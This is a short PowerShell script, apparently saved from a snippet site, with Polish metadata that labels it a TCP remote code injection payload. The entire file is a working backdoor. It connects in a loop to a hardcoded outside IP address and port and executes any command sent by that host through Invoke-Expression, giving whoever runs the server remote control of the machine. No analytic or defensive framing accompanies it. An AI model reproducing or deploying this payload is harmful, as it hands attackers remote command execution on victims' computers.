#
# ID: 816716
# Nazwa: PowerShell TCP RCI Payload
# Opis: PowerShell Remote Code Injection client (payload)
# Publiczny: 0
# Data utworzenia/ostatniej edycji (UTC): 2023-11-08 08:13:07
#

$socketHost = "162.19.224.235"

$socketPort = "8880"



while ($true) {

    try {

        $tcpConnection = New-Object System.Net.Sockets.TcpClient($socketHost, $socketPort)

        $tcpStream = $tcpConnection.GetStream()

        $reader = New-Object System.IO.StreamReader($tcpStream)



        while ($tcpConnection.Connected) {

            while ($tcpStream.DataAvailable -or $reader.Peek() -ne -1 ) {

                $response = $reader.ReadLine()

                $prefix = $response.Split(" ", 2)[0]

                if ($prefix -eq "CMD") {

                    $command = $response.Split(" ", 2)[1]



                    Invoke-Expression $command

                }

            }



            start-sleep -Milliseconds 500

        }

    } catch {

        Write-Output "Err:`n$_"

    }



    start-sleep -Milliseconds 5000

}



$reader.Close()

$tcpConnection.Close()